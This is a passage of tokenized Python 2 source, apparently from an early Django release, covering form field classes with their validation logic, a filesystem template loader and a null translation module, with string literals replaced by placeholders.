'<STR_LIT:max_length>' ] = kwargs . get ( '<STR_LIT:max_length>' , <NUM_LIT:200> ) <EOL> CharField . __init__ ( self , verbose_name , name , ** kwargs ) <EOL> self . validators . append ( validators . URLValidator ( verify_exists = verify_exists ) ) <EOL> def formfield ( self , ** kwargs ) : <EOL> defaults = { <EOL> '<STR_LIT>' : forms . URLField , <EOL> } <EOL> defaults . update ( kwargs ) <EOL> return super ( URLField , self ) . formfield ( ** defaults ) <EOL> class XMLField ( TextField ) : <EOL> description = _ ( "<STR_LIT>" ) <EOL> def __init__ ( self , verbose_name = None , name = None , schema_path = None , ** kwargs ) : <EOL> self . schema_path = schema_path <EOL> Field . __init__ ( self , verbose_name , name , ** kwargs ) </s>
<s> """<STR_LIT>""" <EOL> import datetime <EOL> import os <EOL> import re <EOL> import time <EOL> import urlparse <EOL> import warnings <EOL> from decimal import Decimal , DecimalException <EOL> try : <EOL> from cStringIO import StringIO <EOL> except ImportError : <EOL> from StringIO import StringIO <EOL> from django . core . exceptions import ValidationError <EOL> from django . core import validators <EOL> import django . utils . copycompat as copy <EOL> from django . utils import formats <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from django . utils . encoding import smart_unicode , smart_str <EOL> from django . utils . functional import lazy <EOL> from django . core . validators import EMPTY_VALUES <EOL> from util import ErrorList <EOL> from widgets import TextInput , PasswordInput , HiddenInput , MultipleHiddenInput , FileInput , CheckboxInput , Select , NullBooleanSelect , SelectMultiple , DateInput , DateTimeInput , TimeInput , SplitDateTimeWidget , SplitHiddenDateTimeWidget <EOL> __all__ = ( <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ) <EOL> def en_format ( name ) : <EOL> """<STR_LIT>""" <EOL> from django . conf . locale . en import formats <EOL> warnings . warn ( <EOL> "<STR_LIT>" % ( name , name ) , <EOL> PendingDeprecationWarning <EOL> ) <EOL> return getattr ( formats , name ) <EOL> DEFAULT_DATE_INPUT_FORMATS = lazy ( lambda : en_format ( '<STR_LIT>' ) , tuple , list ) ( ) <EOL> DEFAULT_TIME_INPUT_FORMATS = lazy ( lambda : en_format ( '<STR_LIT>' ) , tuple , list ) ( ) <EOL> DEFAULT_DATETIME_INPUT_FORMATS = lazy ( lambda : en_format ( '<STR_LIT>' ) , tuple , list ) ( ) <EOL> class Field ( object ) : <EOL> widget = TextInput <EOL> hidden_widget = HiddenInput <EOL> default_validators = [ ] <EOL> default_error_messages = { <EOL> '<STR_LIT>' : _ ( u'<STR_LIT>' ) , <EOL> '<STR_LIT>' : _ ( u'<STR_LIT>' ) , <EOL> } <EOL> creation_counter = <NUM_LIT:0> <EOL> def __init__ ( self , required = True , widget = None , label = None , initial = None , <EOL> help_text = None , error_messages = None , show_hidden_initial = False , <EOL> validators = [ ] , localize = False ) : <EOL> if label is not None : <EOL> label = smart_unicode ( label ) <EOL> self . required , self . label , self . initial = required , label , initial <EOL> self . show_hidden_initial = show_hidden_initial <EOL> if help_text is None : <EOL> self . help_text = u'<STR_LIT>' <EOL> else : <EOL> self . help_text = smart_unicode ( help_text ) <EOL> widget = widget or self . widget <EOL> if isinstance ( widget , type ) : <EOL> widget = widget ( ) <EOL> self . localize = localize <EOL> if self . localize : <EOL> widget . is_localized = True <EOL> extra_attrs = self . widget_attrs ( widget ) <EOL> if extra_attrs : <EOL> widget . attrs . update ( extra_attrs ) <EOL> self . widget = widget <EOL> self . creation_counter = Field . creation_counter <EOL> Field . creation_counter += <NUM_LIT:1> <EOL> messages = { } <EOL> for c in reversed ( self . __class__ . __mro__ ) : <EOL> messages . update ( getattr ( c , '<STR_LIT>' , { } ) ) <EOL> messages . update ( error_messages or { } ) <EOL> self . error_messages = messages <EOL> self . validators = self . default_validators + validators <EOL> def prepare_value ( self , value ) : <EOL> return value <EOL> def to_python ( self , value ) : <EOL> return value <EOL> def validate ( self , value ) : <EOL> if value in validators . EMPTY_VALUES and self . required : <EOL> raise ValidationError ( self . error_messages [ '<STR_LIT>' ] ) <EOL> def run_validators ( self , value ) : <EOL> if value in validators . EMPTY_VALUES : <EOL> return <EOL> errors = [ ] <EOL> for v in self . validators : <EOL> try : <EOL> v ( value ) <EOL> except ValidationError , e : <EOL> if hasattr ( e , '<STR_LIT:code>' ) and e . code in self . error_messages : <EOL> message = self . error_messages [ e . code ] <EOL> if e . params : <EOL> message = message % e . params <EOL> errors . append ( message ) <EOL> else : <EOL> errors . extend ( e . messages ) <EOL> if errors : <EOL> raise ValidationError ( errors ) <EOL> def clean ( self , value ) : <EOL> """<STR_LIT>""" <EOL> value = self . to_python ( value ) <EOL> self . validate ( value ) <EOL> self . run_validators ( value ) <EOL> return value <EOL> def widget_attrs ( self , widget ) : <EOL> """<STR_LIT>""" <EOL> return { } <EOL> def __deepcopy__ ( self , memo ) : <EOL> result = copy . copy ( self ) <EOL> memo [ id ( self ) ] = result <EOL> result . widget = copy . deepcopy ( self . widget , memo ) <EOL> return result <EOL> class CharField ( Field ) : <EOL> def __init__ ( self , max_length = None , min_length = None , * args , ** kwargs ) : <EOL> self . max_length , self . min_length = max_length , min_length <EOL> super ( CharField , self ) . __init__ ( * args , ** kwargs ) <EOL> if min_length is not None : <EOL> self . validators . append ( validators . MinLengthValidator ( min_length ) ) <EOL> if max_length is not None : <EOL> self . validators . append ( validators . MaxLengthValidator ( max_length ) ) <EOL> def to_python ( self , value ) : <EOL> "<STR_LIT>" <EOL> if value in validators . EMPTY_VALUES : <EOL> return u'<STR_LIT>' <EOL> return smart_unicode ( value ) <EOL> def widget_attrs ( self , widget ) : <EOL> if self . max_length is not None and isinstance ( widget , ( TextInput , PasswordInput ) ) : <EOL> return { '<STR_LIT>' : str ( self . max_length ) } <EOL> class IntegerField ( Field ) : <EOL> default_error_messages = { <EOL> '<STR_LIT>' : _ ( u'<STR_LIT>' ) , <EOL> '<STR_LIT>' : _ ( u'<STR_LIT>' ) , <EOL> '<STR_LIT>' : _ ( u'<STR_LIT>' ) , <EOL> } <EOL> def __init__ ( self , max_value = None , min_value = None , * args , ** kwargs ) : <EOL> self . max_value , self . min_value = max_value , min_value <EOL> super ( IntegerField , self ) . __init__ ( * args , ** kwargs ) <EOL> if max_value is not None : <EOL> self . validators . append ( validators . MaxValueValidator ( max_value ) ) <EOL> if min_value is not None : <EOL> self . validators . append ( validators . MinValueValidator ( min_value ) ) <EOL> def to_python ( self , value ) : <EOL> """<STR_LIT>""" <EOL> value = super ( IntegerField , self ) . to_python ( value ) <EOL> if value in validators . EMPTY_VALUES : <EOL> return None <EOL> if self . localize : <EOL> value = formats . sanitize_separators ( value ) <EOL> try : <EOL> value = int ( str ( value ) ) <EOL> except ( ValueError , TypeError ) : <EOL> raise ValidationError ( self . error_messages [ '<STR_LIT>' ] ) <EOL> return value <EOL> class FloatField ( IntegerField ) : <EOL> default_error_messages = { <EOL> '<STR_LIT>' : _ ( u'<STR_LIT>' ) , <EOL> } <EOL> def to_python ( self , value ) : <EOL> """<STR_LIT>""" <EOL> value = super ( IntegerField , self ) . to_python ( value ) <EOL> if value in validators . EMPTY_VALUES : <EOL> return None <EOL> if self . localize : <EOL> value = formats . sanitize_separators ( value ) <EOL> try : <EOL> value = float ( value ) <EOL> except ( ValueError , TypeError ) : <EOL> raise ValidationError ( self . error_messages [ '<STR_LIT>' ] ) <EOL> return value <EOL> class DecimalField ( Field ) : <EOL> default_error_messages = { <EOL> '<STR_LIT>' : _ ( u'<STR_LIT>' ) , <EOL> '<STR_LIT>' : _ ( u'<STR_LIT>' ) , <EOL> '<STR_LIT>' : _ ( u'<STR_LIT>' ) , <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) <EOL> } <EOL> def __init__ ( self , max_value = None , min_value = None , max_digits = None , decimal_places = None , * args , ** kwargs ) : <EOL> self . max_value , self . min_value = max_value , min_value <EOL> self . max_digits , self . decimal_places = max_digits , decimal_places <EOL> Field . __init__ ( self , * args , ** kwargs ) <EOL> if max_value is not None : <EOL> self . validators . append ( validators . MaxValueValidator ( max_value ) ) <EOL> if min_value is not None : <EOL> self . validators . append ( validators . MinValueValidator ( min_value ) ) <EOL> def to_python ( self , value ) : <EOL> """<STR_LIT>""" <EOL> if value in validators . EMPTY_VALUES : <EOL> return None <EOL> if self . localize : <EOL> value = formats . sanitize_separators ( value ) <EOL> value = smart_str ( value ) . strip ( ) <EOL> try : <EOL> value = Decimal ( value ) <EOL> except DecimalException : <EOL> raise ValidationError ( self . error_messages [ '<STR_LIT>' ] ) <EOL> return value <EOL> def validate ( self , value ) : <EOL> super ( DecimalField , self ) . validate ( value ) <EOL> if value in validators . EMPTY_VALUES : <EOL> return <EOL> if value != value or value == Decimal ( "<STR_LIT>" ) or value == Decimal ( "<STR_LIT>" ) : <EOL> raise ValidationError ( self . error_messages [ '<STR_LIT>' ] ) <EOL> sign , digittuple , exponent = value . as_tuple ( ) <EOL> decimals = abs ( exponent ) <EOL> digits = len ( digittuple ) <EOL> if decimals > digits : <EOL> digits = decimals <EOL> whole_digits = digits - decimals <EOL> if self . max_digits is not None and digits > self . max_digits : <EOL> raise ValidationError ( self . error_messages [ '<STR_LIT>' ] % self . max_digits ) <EOL> if self . decimal_places is not None and decimals > self . decimal_places : <EOL> raise ValidationError ( self . error_messages [ '<STR_LIT>' ] % self . decimal_places ) <EOL> if self . max_digits is not None and self . decimal_places is not None and whole_digits > ( self . max_digits - self . decimal_places ) : <EOL> raise ValidationError ( self . error_messages [ '<STR_LIT>' ] % ( self . max_digits - self . decimal_places ) ) <EOL> return value <EOL> class DateField ( Field ) : <EOL> widget = DateInput <EOL> default_error_messages = { <EOL> '<STR_LIT>' : _ ( u'<STR_LIT>' ) , <EOL> } <EOL> def __init__ ( self , input_formats = None , * args , ** kwargs ) : <EOL> super ( DateField , self ) . __init__ ( * args , ** kwargs ) <EOL> self . input_formats = input_formats <EOL> def to_python ( self , value ) : <EOL> """<STR_LIT>""" <EOL> if value in validators . EMPTY_VALUES : <EOL> return None <EOL> if isinstance ( value , datetime . datetime ) : <EOL> return value . date ( ) <EOL> if isinstance ( value , datetime . date ) : <EOL> return value <EOL> for format in self . input_formats or formats . get_format ( '<STR_LIT>' ) : <EOL> try : <EOL> return datetime . date ( * time . strptime ( value , format ) [ : <NUM_LIT:3> ] ) <EOL> except ValueError : <EOL> continue <EOL> raise ValidationError ( self . error_messages [ '<STR_LIT>' ] ) <EOL> class TimeField ( Field ) : <EOL> widget = TimeInput <EOL> default_error_messages = { <EOL> '<STR_LIT>' : _ ( u'<STR_LIT>' ) <EOL> } <EOL> def __init__ ( self , input_formats = None , * args , ** kwargs ) : <EOL> super ( TimeField , self ) . __init__ ( * args , ** kwargs ) <EOL> self . input_formats = input_formats <EOL> def to_python ( self , value ) : <EOL> """<STR_LIT>""" <EOL> if value in validators . EMPTY_VALUES : <EOL> return None <EOL> if isinstance ( value , datetime . time ) : <EOL> return value <EOL> for format in self . input_formats or formats . get_format ( '<STR_LIT>' ) : <EOL> try : <EOL> return datetime . time ( * time . strptime ( value , format ) [ <NUM_LIT:3> : <NUM_LIT:6> ] ) <EOL> except ValueError : <EOL> continue <EOL> raise ValidationError ( self . error_messages [ '<STR_LIT>' ] ) <EOL> class DateTimeField ( Field ) : <EOL> widget = DateTimeInput <EOL> default_error_messages = { <EOL> '<STR_LIT>' : _ ( u'<STR_LIT>' ) , <EOL> } <EOL> def __init__ ( self , input_formats = None , * args , ** kwargs ) : <EOL> super ( DateTimeField , self ) . __init__ ( * args , ** kwargs ) <EOL> self . input_formats = input_formats <EOL> def to_python ( self , value ) : <EOL> """<STR_LIT>""" <EOL> if value in validators . EMPTY_VALUES : <EOL> return None <EOL> if isinstance ( value , datetime . datetime ) : <EOL> return value <EOL> if isinstance ( value , datetime . date ) : <EOL> return datetime . datetime ( value . year , value . month , value . day ) <EOL> if isinstance ( value , list ) : <EOL> if len ( value ) != <NUM_LIT:2> : <EOL> raise ValidationError ( self . error_messages [ '<STR_LIT>' ] ) <EOL> if value [ <NUM_LIT:0> ] in validators . EMPTY_VALUES and value [ <NUM_LIT:1> ] in validators . EMPTY_VALUES : <EOL> return None <EOL> value = '<STR_LIT>' % tuple ( value ) <EOL> for format in self . input_formats or formats . get_format ( '<STR_LIT>' ) : <EOL> try : <EOL> return datetime . datetime ( * time . strptime ( value , format ) [ : <NUM_LIT:6> ] ) <EOL> except ValueError : <EOL> continue <EOL> raise ValidationError ( self . error_messages [ '<STR_LIT>' ] ) <EOL> class RegexField ( CharField ) : <EOL> def __init__ ( self , regex , max_length = None , min_length = None , error_message = None , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if error_message : <EOL> error_messages = kwargs . get ( '<STR_LIT>' ) or { } <EOL> error_messages [ '<STR_LIT>' ] = error_message <EOL> kwargs [ '<STR_LIT>' ] = error_messages <EOL> super ( RegexField , self ) . __init__ ( max_length , min_length , * args , ** kwargs ) <EOL> if isinstance ( regex , basestring ) : <EOL> regex = re . compile ( regex ) <EOL> self . regex = regex <EOL> self . validators . append ( validators . RegexValidator ( regex = regex ) ) <EOL> class EmailField ( CharField ) : <EOL> default_error_messages = { <EOL> '<STR_LIT>' : _ ( u'<STR_LIT>' ) , <EOL> } <EOL> default_validators = [ validators . validate_email ] <EOL> def clean ( self , value ) : <EOL> value = self . to_python ( value ) . strip ( ) <EOL> return super ( EmailField , self ) . clean ( value ) <EOL> class FileField ( Field ) : <EOL> widget = FileInput <EOL> default_error_messages = { <EOL> '<STR_LIT>' : _ ( u"<STR_LIT>" ) , <EOL> '<STR_LIT>' : _ ( u"<STR_LIT>" ) , <EOL> '<STR_LIT>' : _ ( u"<STR_LIT>" ) , <EOL> '<STR_LIT:max_length>' : _ ( u'<STR_LIT>' ) , <EOL> } <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> self . max_length = kwargs . pop ( '<STR_LIT:max_length>' , None ) <EOL> super ( FileField , self ) . __init__ ( * args , ** kwargs ) <EOL> def to_python ( self , data ) : <EOL> if data in validators . EMPTY_VALUES : <EOL> return None <EOL> try : <EOL> file_name = data . name <EOL> file_size = data . size <EOL> except AttributeError : <EOL> raise ValidationError ( self . error_messages [ '<STR_LIT>' ] ) <EOL> if self . max_length is not None and len ( file_name ) > self . max_length : <EOL> error_values = { '<STR_LIT>' : self . max_length , '<STR_LIT>' : len ( file_name ) } <EOL> raise ValidationError ( self . error_messages [ '<STR_LIT:max_length>' ] % error_values ) <EOL> if not file_name : <EOL> raise ValidationError ( self . error_messages [ '<STR_LIT>' ] ) <EOL> if not file_size : <EOL> raise ValidationError ( self . error_messages [ '<STR_LIT>' ] ) <EOL> return data <EOL> def clean ( self , data , initial = None ) : <EOL> if not data and initial : <EOL> return initial <EOL> return super ( FileField , self ) . clean ( data ) <EOL> class ImageField ( FileField ) : <EOL> default_error_messages = { <EOL> '<STR_LIT>' : _ ( u"<STR_LIT>" ) , <EOL> } <EOL> def to_python ( self , data ) : <EOL> """<STR_LIT>""" <EOL> f = super ( ImageField , self ) . to_python ( data ) <EOL> if f is None : <EOL> return None <EOL> try : <EOL> from PIL import Image <EOL> except ImportError : <EOL> import Image <EOL> if hasattr ( data , '<STR_LIT>' ) : <EOL> file = data . temporary_file_path ( ) <EOL> else : <EOL> if hasattr ( data , '<STR_LIT>' ) : <EOL> file = StringIO ( data . read ( ) ) <EOL> else : <EOL> file = StringIO ( data [ '<STR_LIT:content>' ] ) <EOL> try : <EOL> trial_image = Image . open ( file ) <EOL> trial_image . load ( ) <EOL> if hasattr ( file , '<STR_LIT>' ) : <EOL> file . reset ( ) <EOL> trial_image = Image . open ( file ) <EOL> trial_image . verify ( ) <EOL> except ImportError : <EOL> raise <EOL> except Exception : <EOL> raise ValidationError ( self . error_messages [ '<STR_LIT>' ] ) <EOL> if hasattr ( f , '<STR_LIT>' ) and callable ( f . seek ) : <EOL> f . seek ( <NUM_LIT:0> ) <EOL> return f <EOL> class URLField ( CharField ) : <EOL> default_error_messages = { <EOL> '<STR_LIT>' : _ ( u'<STR_LIT>' ) , <EOL> '<STR_LIT>' : _ ( u'<STR_LIT>' ) , <EOL> } <EOL> def __init__ ( self , max_length = None , min_length = None , verify_exists = False , <EOL> validator_user_agent = validators . URL_VALIDATOR_USER_AGENT , * args , ** kwargs ) : <EOL> super ( URLField , self ) . __init__ ( max_length , min_length , * args , <EOL> ** kwargs ) <EOL> self . validators . append ( validators . URLValidator ( verify_exists = verify_exists , validator_user_agent = validator_user_agent ) ) <EOL> def to_python ( self , value ) : <EOL> if value : <EOL> url_fields = list ( urlparse . urlsplit ( value ) ) <EOL> if not url_fields [ <NUM_LIT:0> ] : <EOL> url_fields [ <NUM_LIT:0> ] = '<STR_LIT:http>' <EOL> if not url_fields [ <NUM_LIT:1> ] : <EOL> url_fields [ <NUM_LIT:1> ] = url_fields [ <NUM_LIT:2> ] <EOL> url_fields [ <NUM_LIT:2> ] = '<STR_LIT>' <EOL> value = urlparse . urlunsplit ( url_fields ) <EOL> url_fields = list ( urlparse . urlsplit ( value ) ) <EOL> if not url_fields [ <NUM_LIT:2> ] : <EOL> url_fields [ <NUM_LIT:2> ] = '<STR_LIT:/>' <EOL> value = urlparse . urlunsplit ( url_fields ) <EOL> return super ( URLField , self ) . to_python ( value ) <EOL> class BooleanField ( Field ) : <EOL> widget = CheckboxInput <EOL> def to_python ( self , value ) : <EOL> """<STR_LIT>""" <EOL> if value in ( '<STR_LIT:False>' , '<STR_LIT:0>' ) : <EOL> value = False <EOL> else : <EOL> value = bool ( value ) <EOL> value = super ( BooleanField , self ) . to_python ( value ) <EOL> if not value and self . required : <EOL> raise ValidationError ( self . error_messages [ '<STR_LIT>' ] ) <EOL> return value <EOL> class NullBooleanField ( BooleanField ) : <EOL> """<STR_LIT>""" <EOL> widget = NullBooleanSelect <EOL> def to_python ( self , value ) : <EOL> """<STR_LIT>""" <EOL> if value in ( True , '<STR_LIT:True>' , '<STR_LIT:1>' ) : <EOL> return True <EOL> elif value in ( False , '<STR_LIT:False>' , '<STR_LIT:0>' ) : <EOL> return False <EOL> else : <EOL> return None <EOL> def validate ( self , value ) : <EOL> pass <EOL> class ChoiceField ( Field ) : <EOL> widget = Select <EOL> default_error_messages = { <EOL> '<STR_LIT>' : _ ( u'<STR_LIT>' ) , <EOL> } <EOL> def __init__ ( self , choices = ( ) , required = True , widget = None , label = None , <EOL> initial = None , help_text = None , * args , ** kwargs ) : <EOL> super ( ChoiceField , self ) . __init__ ( required = required , widget = widget , label = label , <EOL> initial = initial , help_text = help_text , * args , ** kwargs ) <EOL> self . choices = choices <EOL> def _get_choices ( self ) : <EOL> return self . _choices <EOL> def _set_choices ( self , value ) : <EOL> self . _choices = self . widget . choices = list ( value ) <EOL> choices = property ( _get_choices , _set_choices ) <EOL> def to_python ( self , value ) : <EOL> "<STR_LIT>" <EOL> if value in validators . EMPTY_VALUES : <EOL> return u'<STR_LIT>' <EOL> return smart_unicode ( value ) <EOL> def validate ( self , value ) : <EOL> """<STR_LIT>""" <EOL> super ( ChoiceField , self ) . validate ( value ) <EOL> if value and not self . valid_value ( value ) : <EOL> raise ValidationError ( self . error_messages [ '<STR_LIT>' ] % { '<STR_LIT:value>' : value } ) <EOL> def valid_value ( self , value ) : <EOL> "<STR_LIT>" <EOL> for k , v in self . choices : <EOL> if isinstance ( v , ( list , tuple ) ) : <EOL> for k2 , v2 in v : <EOL> if value == smart_unicode ( k2 ) : <EOL> return True <EOL> else : <EOL> if value == smart_unicode ( k ) : <EOL> return True <EOL> return False <EOL> class TypedChoiceField ( ChoiceField ) : <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> self . coerce = kwargs . pop ( '<STR_LIT>' , lambda val : val ) <EOL> self . empty_value = kwargs . pop ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> super ( TypedChoiceField , self ) . __init__ ( * args , ** kwargs ) <EOL> def to_python ( self , value ) : <EOL> """<STR_LIT>""" <EOL> value = super ( TypedChoiceField , self ) . to_python ( value ) <EOL> super ( TypedChoiceField , self ) . validate ( value ) <EOL> if value == self . empty_value or value in validators . EMPTY_VALUES : <EOL> return self . empty_value <EOL> try : <EOL> value = self . coerce ( value ) <EOL> except ( ValueError , TypeError , ValidationError ) : <EOL> raise ValidationError ( self . error_messages [ '<STR_LIT>' ] % { '<STR_LIT:value>' : value } ) <EOL> return value <EOL> def validate ( self , value ) : <EOL> pass <EOL> class MultipleChoiceField ( ChoiceField ) : <EOL> hidden_widget = MultipleHiddenInput <EOL> widget = SelectMultiple <EOL> default_error_messages = { <EOL> '<STR_LIT>' : _ ( u'<STR_LIT>' ) , <EOL> '<STR_LIT>' : _ ( u'<STR_LIT>' ) , <EOL> } <EOL> def to_python ( self , value ) : <EOL> if not value : <EOL> return [ ] <EOL> elif not isinstance ( value , ( list , tuple ) ) : <EOL> raise ValidationError ( self . error_messages [ '<STR_LIT>' ] ) <EOL> return [ smart_unicode ( val ) for val in value ] <EOL> def validate ( self , value ) : <EOL> """<STR_LIT>""" <EOL> if self . required and not value : <EOL> raise ValidationError ( self . error_messages [ '<STR_LIT>' ] ) <EOL> for val in value : <EOL> if not self . valid_value ( val ) : <EOL> raise ValidationError ( self . error_messages [ '<STR_LIT>' ] % { '<STR_LIT:value>' : val } ) <EOL> class ComboField ( Field ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , fields = ( ) , * args , ** kwargs ) : <EOL> super ( ComboField , self ) . __init__ ( * args , ** kwargs ) <EOL> for f in fields : <EOL> f . required = False <EOL> self . fields = fields <EOL> def clean ( self , value ) : <EOL> """<STR_LIT>""" <EOL> super ( ComboField , self ) . clean ( value ) <EOL> for field in self . fields : <EOL> value = field . clean ( value ) <EOL> return value <EOL> class MultiValueField ( Field ) : <EOL> """<STR_LIT>""" <EOL> default_error_messages = { <EOL> '<STR_LIT>' : _ ( u'<STR_LIT>' ) , <EOL> } <EOL> def __init__ ( self , fields = ( ) , * args , ** kwargs ) : <EOL> super ( MultiValueField , self ) . __init__ ( * args , ** kwargs ) <EOL> for f in fields : <EOL> f . required = False <EOL> self . fields = fields <EOL> def validate ( self , value ) : <EOL> pass <EOL> def clean ( self , value ) : <EOL> """<STR_LIT>""" <EOL> clean_data = [ ] <EOL> errors = ErrorList ( ) <EOL> if not value or isinstance ( value , ( list , tuple ) ) : <EOL> if not value or not [ v for v in value if v not in validators . EMPTY_VALUES ] : <EOL> if self . required : <EOL> raise ValidationError ( self . error_messages [ '<STR_LIT>' ] ) <EOL> else : <EOL> return self . compress ( [ ] ) <EOL> else : <EOL> raise ValidationError ( self . error_messages [ '<STR_LIT>' ] ) <EOL> for i , field in enumerate ( self . fields ) : <EOL> try : <EOL> field_value = value [ i ] <EOL> except IndexError : <EOL> field_value = None <EOL> if self . required and field_value in validators . EMPTY_VALUES : <EOL> raise ValidationError ( self . error_messages [ '<STR_LIT>' ] ) <EOL> try : <EOL> clean_data . append ( field . clean ( field_value ) ) <EOL> except ValidationError , e : <EOL> errors . extend ( e . messages ) <EOL> if errors : <EOL> raise ValidationError ( errors ) <EOL> out = self . compress ( clean_data ) <EOL> self . validate ( out ) <EOL> return out <EOL> def compress ( self , data_list ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( '<STR_LIT>' ) <EOL> class FilePathField ( ChoiceField ) : <EOL> def __init__ ( self , path , match = None , recursive = False , required = True , <EOL> widget = None , label = None , initial = None , help_text = None , <EOL> * args , ** kwargs ) : <EOL> self . path , self . match , self . recursive = path , match , recursive <EOL> super ( FilePathField , self ) . __init__ ( choices = ( ) , required = required , <EOL> widget = widget , label = label , initial = initial , help_text = help_text , <EOL> * args , ** kwargs ) <EOL> if self . required : <EOL> self . choices = [ ] <EOL> else : <EOL> self . choices = [ ( "<STR_LIT>" , "<STR_LIT>" ) ] <EOL> if self . match is not None : <EOL> self . match_re = re . compile ( self . match ) <EOL> if recursive : <EOL> for root , dirs , files in sorted ( os . walk ( self . path ) ) : <EOL> for f in files : <EOL> if self . match is None or self . match_re . search ( f ) : <EOL> f = os . path . join ( root , f ) <EOL> self . choices . append ( ( f , f . replace ( path , "<STR_LIT>" , <NUM_LIT:1> ) ) ) <EOL> else : <EOL> try : <EOL> for f in sorted ( os . listdir ( self . path ) ) : <EOL> full_file = os . path . join ( self . path , f ) <EOL> if os . path . isfile ( full_file ) and ( self . match is None or self . match_re . search ( f ) ) : <EOL> self . choices . append ( ( full_file , f ) ) <EOL> except OSError : <EOL> pass <EOL> self . widget . choices = self . choices <EOL> class SplitDateTimeField ( MultiValueField ) : <EOL> widget = SplitDateTimeWidget <EOL> hidden_widget = SplitHiddenDateTimeWidget <EOL> default_error_messages = { <EOL> '<STR_LIT>' : _ ( u'<STR_LIT>' ) , <EOL> '<STR_LIT>' : _ ( u'<STR_LIT>' ) , <EOL> } <EOL> def __init__ ( self , input_date_formats = None , input_time_formats = None , * args , ** kwargs ) : <EOL> errors = self . default_error_messages . copy ( ) <EOL> if '<STR_LIT>' in kwargs : <EOL> errors . update ( kwargs [ '<STR_LIT>' ] ) <EOL> localize = kwargs . get ( '<STR_LIT>' , False ) <EOL> fields = ( <EOL> DateField ( input_formats = input_date_formats , <EOL> error_messages = { '<STR_LIT>' : errors [ '<STR_LIT>' ] } , <EOL> localize = localize ) , <EOL> TimeField ( input_formats = input_time_formats , <EOL> error_messages = { '<STR_LIT>' : errors [ '<STR_LIT>' ] } , <EOL> localize = localize ) , <EOL> ) <EOL> super ( SplitDateTimeField , self ) . __init__ ( fields , * args , ** kwargs ) <EOL> def compress ( self , data_list ) : <EOL> if data_list : <EOL> if data_list [ <NUM_LIT:0> ] in validators . EMPTY_VALUES : <EOL> raise ValidationError ( self . error_messages [ '<STR_LIT>' ] ) <EOL> if data_list [ <NUM_LIT:1> ] in validators . EMPTY_VALUES : <EOL> raise ValidationError ( self . error_messages [ '<STR_LIT>' ] ) <EOL> return datetime . datetime . combine ( * data_list ) <EOL> return None <EOL> class IPAddressField ( CharField ) : <EOL> default_error_messages = { <EOL> '<STR_LIT>' : _ ( u'<STR_LIT>' ) , <EOL> } <EOL> default_validators = [ validators . validate_ipv4_address ] <EOL> class SlugField ( CharField ) : <EOL> default_error_messages = { <EOL> '<STR_LIT>' : _ ( u"<STR_LIT>" <EOL> u"<STR_LIT>" ) , <EOL> } <EOL> default_validators = [ validators . validate_slug ] </s>
<s> """<STR_LIT>""" <EOL> from django . conf import settings <EOL> from django . template import TemplateDoesNotExist <EOL> from django . template . loader import BaseLoader <EOL> from django . utils . _os import safe_join <EOL> class Loader ( BaseLoader ) : <EOL> is_usable = True <EOL> def get_template_sources ( self , template_name , template_dirs = None ) : <EOL> """<STR_LIT>""" <EOL> if not template_dirs : <EOL> template_dirs = settings . TEMPLATE_DIRS <EOL> for template_dir in template_dirs : <EOL> try : <EOL> yield safe_join ( template_dir , template_name ) <EOL> except UnicodeDecodeError : <EOL> raise <EOL> except ValueError : <EOL> pass <EOL> def load_template_source ( self , template_name , template_dirs = None ) : <EOL> tried = [ ] <EOL> for filepath in self . get_template_sources ( template_name , template_dirs ) : <EOL> try : <EOL> file = open ( filepath ) <EOL> try : <EOL> return ( file . read ( ) . decode ( settings . FILE_CHARSET ) , filepath ) <EOL> finally : <EOL> file . close ( ) <EOL> except IOError : <EOL> tried . append ( filepath ) <EOL> if tried : <EOL> error_msg = "<STR_LIT>" % tried <EOL> else : <EOL> error_msg = "<STR_LIT>" <EOL> raise TemplateDoesNotExist ( error_msg ) <EOL> load_template_source . is_usable = True <EOL> _loader = Loader ( ) <EOL> def load_template_source ( template_name , template_dirs = None ) : <EOL> import warnings <EOL> warnings . warn ( <EOL> "<STR_LIT>" , <EOL> PendingDeprecationWarning <EOL> ) <EOL> return _loader . load_template_source ( template_name , template_dirs ) <EOL> load_template_source . is_usable = True </s>
<s> import warnings <EOL> from django . conf import settings <EOL> from django . utils . encoding import force_unicode <EOL> from django . utils . safestring import mark_safe , SafeData <EOL> def ngettext ( singular , plural , number ) : <EOL> if number == <NUM_LIT:1> : return singular <EOL> return plural <EOL> ngettext_lazy = ngettext <EOL> def ungettext ( singular , plural , number ) : <EOL> return force_unicode ( ngettext ( singular , plural , number ) ) <EOL> activate = lambda x : None <EOL> deactivate = deactivate_all = lambda : None <EOL> get_language = lambda : settings . LANGUAGE_CODE <EOL> get_language_bidi = lambda : settings . LANGUAGE_CODE in settings . LANGUAGES_BIDI <EOL> check_for_language = lambda x : True <EOL> TECHNICAL_ID_MAP = { <EOL> "<STR_LIT>" : settings . DATETIME_FORMAT , <EOL> "<STR_LIT>" : settings . DATE_FORMAT , <EOL> "<STR_LIT>" : settings . DATETIME_FORMAT , <EOL> "<STR_LIT>" : settings . TIME_FORMAT , <EOL> "<STR_LIT>" : settings . YEAR_MONTH_FORMAT , <EOL> "<STR_LIT>" : settings . MONTH_DAY_FORMAT , <EOL> } <EOL> def gettext ( message ) : <EOL> result = TECHNICAL_ID_MAP . get ( message , message ) <EOL> if isinstance ( message , SafeData ) : <EOL> 